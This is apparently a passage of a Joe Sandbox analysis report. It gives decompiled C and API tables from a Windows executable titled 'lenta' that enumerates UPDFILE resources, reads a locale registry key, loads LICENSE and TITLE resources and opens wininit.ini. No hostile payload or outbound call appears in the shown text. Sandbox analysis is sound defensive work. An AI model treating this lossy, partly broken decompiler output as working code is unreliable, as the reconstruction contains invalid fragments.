				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0005171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x59124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x5a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0005171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00056CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                                                                0x00056298
                                                                                                                                                                                                                                                0x000562a0
                                                                                                                                                                                                                                                0x000562a7
                                                                                                                                                                                                                                                0x000562ad
                                                                                                                                                                                                                                                0x000562af
                                                                                                                                                                                                                                                0x000562bb
                                                                                                                                                                                                                                                0x000562c3
                                                                                                                                                                                                                                                0x000562c4
                                                                                                                                                                                                                                                0x0005633b
                                                                                                                                                                                                                                                0x0005633b
                                                                                                                                                                                                                                                0x00056345
                                                                                                                                                                                                                                                0x0005634d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000562da
                                                                                                                                                                                                                                                0x000562de
                                                                                                                                                                                                                                                0x0005635f
                                                                                                                                                                                                                                                0x00056369
                                                                                                                                                                                                                                                0x000562e0
                                                                                                                                                                                                                                                0x000562e0
                                                                                                                                                                                                                                                0x000562e0
                                                                                                                                                                                                                                                0x000562e3
                                                                                                                                                                                                                                                0x000562e5
                                                                                                                                                                                                                                                0x000562e5
                                                                                                                                                                                                                                                0x000562e8
                                                                                                                                                                                                                                                0x000562e8
                                                                                                                                                                                                                                                0x000562ea
                                                                                                                                                                                                                                                0x000562eb
                                                                                                                                                                                                                                                0x000562ef
                                                                                                                                                                                                                                                0x000562f1
                                                                                                                                                                                                                                                0x000562f3
                                                                                                                                                                                                                                                0x00056302
                                                                                                                                                                                                                                                0x00056308
                                                                                                                                                                                                                                                0x0005630d
                                                                                                                                                                                                                                                0x00056314
                                                                                                                                                                                                                                                0x00056314
                                                                                                                                                                                                                                                0x00056316
                                                                                                                                                                                                                                                0x00056319
                                                                                                                                                                                                                                                0x00056355
                                                                                                                                                                                                                                                0x00056357
                                                                                                                                                                                                                                                0x0005631b
                                                                                                                                                                                                                                                0x0005631b
                                                                                                                                                                                                                                                0x00056331
                                                                                                                                                                                                                                                0x00056334
                                                                                                                                                                                                                                                0x00056339
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056339
                                                                                                                                                                                                                                                0x00056319
                                                                                                                                                                                                                                                0x0005636b
                                                                                                                                                                                                                                                0x0005637d
                                                                                                                                                                                                                                                0x0005637d
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005171E: _vsnprintf.MSVCRT ref: 00051750
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,000551CA,00000004,00000024,00052F71,?,00000002,00000000), ref: 000562CD
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,000551CA,00000004,00000024,00052F71,?,00000002,00000000), ref: 000562D4
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000551CA,00000004,00000024,00052F71,?,00000002,00000000), ref: 0005631B
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00056345
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000551CA,00000004,00000024,00052F71,?,00000002,00000000), ref: 00056357
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                • Opcode ID: bec1bb1d4af10d762aacf75a99e92333ba465b8729cda7bfe777957d37acc5f5
                                                                                                                                                                                                                                                • Instruction ID: 4f7fab1ae323ca6cb3b7df705f8564ca3786adda2d2d7a698a5da2971ecc5582
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bec1bb1d4af10d762aacf75a99e92333ba465b8729cda7bfe777957d37acc5f5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C821B675A00219ABDB109F64DC459FF7B7CEB49716B000219EE02A7241DB3A9D09CBE1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0005681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E0005681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x58004; // 0x5a679bd9
				_v8 = _t19 ^ _t44;
				_t41 =  *0x581d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x581d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x581d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x51140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E000566F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x581d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00056CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                                                                0x0005681f
                                                                                                                                                                                                                                                0x0005682a
                                                                                                                                                                                                                                                0x00056831
                                                                                                                                                                                                                                                0x00056836
                                                                                                                                                                                                                                                0x0005683c
                                                                                                                                                                                                                                                0x0005683e
                                                                                                                                                                                                                                                0x00056848
                                                                                                                                                                                                                                                0x00056851
                                                                                                                                                                                                                                                0x0005685d
                                                                                                                                                                                                                                                0x00056864
                                                                                                                                                                                                                                                0x00056876
                                                                                                                                                                                                                                                0x0005693a
                                                                                                                                                                                                                                                0x0005693a
                                                                                                                                                                                                                                                0x0005687c
                                                                                                                                                                                                                                                0x0005687e
                                                                                                                                                                                                                                                0x00056885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000568d6
                                                                                                                                                                                                                                                0x000568f4
                                                                                                                                                                                                                                                0x00056900
                                                                                                                                                                                                                                                0x00056902
                                                                                                                                                                                                                                                0x0005690a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005690c
                                                                                                                                                                                                                                                0x0005690c
                                                                                                                                                                                                                                                0x0005691c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005691e
                                                                                                                                                                                                                                                0x00056924
                                                                                                                                                                                                                                                0x0005692b
                                                                                                                                                                                                                                                0x00056932
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005692b
                                                                                                                                                                                                                                                0x0005691c
                                                                                                                                                                                                                                                0x0005690a
                                                                                                                                                                                                                                                0x00056885
                                                                                                                                                                                                                                                0x00056876
                                                                                                                                                                                                                                                0x00056951

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0005686E
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 000568A7
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000568CC
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00051140,00000000,?,?,0000000C), ref: 000568F4
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00056902
                                                                                                                                                                                                                                                  • Part of subcall function 000566F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0005691A), ref: 00056741
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 000568C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                • Opcode ID: a00ef493ae1fd536f3cdec72e73e88abec64a3cecf1f6fc30f0c02f2d930b5ae
                                                                                                                                                                                                                                                • Instruction ID: 3f4da304592a5320dba743db32a20a4799485235a9f06958623cf8fe871bf67e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a00ef493ae1fd536f3cdec72e73e88abec64a3cecf1f6fc30f0c02f2d930b5ae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9317C31B013189FEB218B11CC05BABB7BCEB4572AF4045A5ED49A7240DB359E89CB52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00053A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00053A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0005468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x58d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0005468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x58d4c, "<None>") == 0) {
							LocalFree( *0x58d4c);
							L9:
							 *0x59124 = 0;
							return 1;
						}
						_t9 = E00056517(_t19, 0x7d1, 0, E00053100, 0, 0);
						LocalFree( *0x58d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x59124 = 0x800704c7;
						L2:
						return 0;
					}
					E000544B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x58d4c);
					 *0x59124 = 0x80070714;
					goto L2;
				}
				E000544B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x59124 = E00056285();
				goto L2;
			}






                                                                                                                                                                                                                                                0x00053a46
                                                                                                                                                                                                                                                0x00053a57
                                                                                                                                                                                                                                                0x00053a5d
                                                                                                                                                                                                                                                0x00053a63
                                                                                                                                                                                                                                                0x00053a6a
                                                                                                                                                                                                                                                0x00053a91
                                                                                                                                                                                                                                                0x00053a9a
                                                                                                                                                                                                                                                0x00053ad8
                                                                                                                                                                                                                                                0x00053b13
                                                                                                                                                                                                                                                0x00053b19
                                                                                                                                                                                                                                                0x00053b1b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053b21
                                                                                                                                                                                                                                                0x00053ae7
                                                                                                                                                                                                                                                0x00053af4
                                                                                                                                                                                                                                                0x00053afc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053afe
                                                                                                                                                                                                                                                0x00053a87
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053a87
                                                                                                                                                                                                                                                0x00053aa8
                                                                                                                                                                                                                                                0x00053ab3
                                                                                                                                                                                                                                                0x00053ab9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053ab9
                                                                                                                                                                                                                                                0x00053a78
                                                                                                                                                                                                                                                0x00053a82
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00052F64,?,00000002,00000000), ref: 00053A5D
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00053AB3
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                  • Part of subcall function 00056285: GetLastError.KERNEL32(00055BBC), ref: 00056285
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 00053AD0
                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00053B13
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: FindResourceA.KERNEL32(00050000,000007D6,00000005), ref: 0005652A
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: LoadResource.KERNEL32(00050000,00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00056538
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: DialogBoxIndirectParamA.USER32(00050000,00000000,00000547,000519E0,00000000), ref: 00056557
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: FreeResource.KERNEL32(00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00056560
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00053100,00000000,00000000), ref: 00053AF4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                • Opcode ID: cbe9a1a505c069c3f0bc27ec4a0065d6e5fb88cb9f64e5c2b81841c138df9c14
                                                                                                                                                                                                                                                • Instruction ID: 29a1d8cf535f837e0df72aa39d7c7d00efb7e200aa22d59d379655281abe2b5a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbe9a1a505c069c3f0bc27ec4a0065d6e5fb88cb9f64e5c2b81841c138df9c14
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1011DA34300301ABFB645F329C09F5B7AF9DBD5743B10412EBE41E61F1DA7D88048665
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000524E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E000524E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x58004; // 0x5a679bd9
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0005658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00056CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                                                                0x000524e0
                                                                                                                                                                                                                                                0x000524eb
                                                                                                                                                                                                                                                0x000524f2
                                                                                                                                                                                                                                                0x000524f7
                                                                                                                                                                                                                                                0x00052504
                                                                                                                                                                                                                                                0x0005250e
                                                                                                                                                                                                                                                0x0005251d
                                                                                                                                                                                                                                                0x0005252c
                                                                                                                                                                                                                                                0x00052541
                                                                                                                                                                                                                                                0x00052546
                                                                                                                                                                                                                                                0x00052553
                                                                                                                                                                                                                                                0x00052555
                                                                                                                                                                                                                                                0x00052555
                                                                                                                                                                                                                                                0x00052546
                                                                                                                                                                                                                                                0x0005256c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00052506
                                                                                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0005252C
                                                                                                                                                                                                                                                • _lopen.KERNEL32 ref: 0005253B
                                                                                                                                                                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0005254C
                                                                                                                                                                                                                                                • _lclose.KERNEL32(00000000), ref: 00052555
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                • String ID: wininit.ini
                                                                                                                                                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                • Opcode ID: 36571d33ca4a1c24d445cf096edc289c507873b5c2cb2acd5fcbd6529c7b9c85
                                                                                                                                                                                                                                                • Instruction ID: ffb20519dffa1a1950bf74893d28aa32431b7830c499ef5e3be367efae9f8dab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36571d33ca4a1c24d445cf096edc289c507873b5c2cb2acd5fcbd6529c7b9c85
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 880152327002186BD7609B659C0DEDF7BBCDB46762F400255FA49D3190DE788E458AA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000536EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E000536EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x58004; // 0x5a679bd9
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x58184 = 1;
						 *0x58180 = 1;
						L13:
						 *0x59a40 = _t119;
						L14:
						__eflags =  *0x58a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00052A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00052A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x58a38 & 0x00000001;
											if(( *0x58a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0005681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E000567C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E000528E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
